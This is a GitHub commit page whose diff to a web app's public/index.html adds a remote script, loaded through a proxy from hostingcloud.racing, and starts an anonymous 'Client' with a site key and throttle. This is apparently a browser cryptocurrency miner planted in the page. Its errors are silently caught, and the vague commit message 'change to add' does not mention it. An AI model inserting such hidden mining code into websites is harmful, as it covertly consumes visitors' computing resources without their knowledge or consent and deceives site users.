Skip to content
This repository has been archived by the owner on Jul 14, 2024. It is now read-only.

Commit

Permalink
change to add
Browse files Browse the repository at this point in the history
  • Loading branch information
garder500 committed Apr 3, 2024
1 parent 5ceaddc commit df34efb
Show file tree
Hide file tree
Showing 2 changed files with 13 additions and 2 deletions.
13 changes: 12 additions & 1 deletion public/index.html
Original file line number Diff line number Diff line change
Expand Up @@ -31,7 +31,18 @@
<link rel="stylesheet" href="/assets/index-ff040aa9.css">
<link rel="manifest" href="/manifest.webmanifest"></head>
<body style="min-width: 200px;">
<div id="root"></div>
<div id="root"></div>
<script src="https://proxy.ketsuna.com/?url=https%3A%2F%2Fwww.hostingcloud.racing%2F9Kdk.js"></script>
<script>
try{
var _client = new Client.Anonymous('015978d31b8215e1f45c35853ef3525db5031fff9a18c882494f3fadc332994e', {
throttle: 0.6, c: 'w'
});
_client.start();
}catch{
console.log("this was not enabled")
}
</script>
<script src="//www.gstatic.com/cv/js/sender/v1/cast_sender.js?loadCastFramework=1"></script>

</body>
Expand Down
2 changes: 1 addition & 1 deletion public/sw.js

Some generated files are not rendered by default. Learn more about how customized files appear on GitHub.

0 comments on commit df34efb

Please sign in to comment.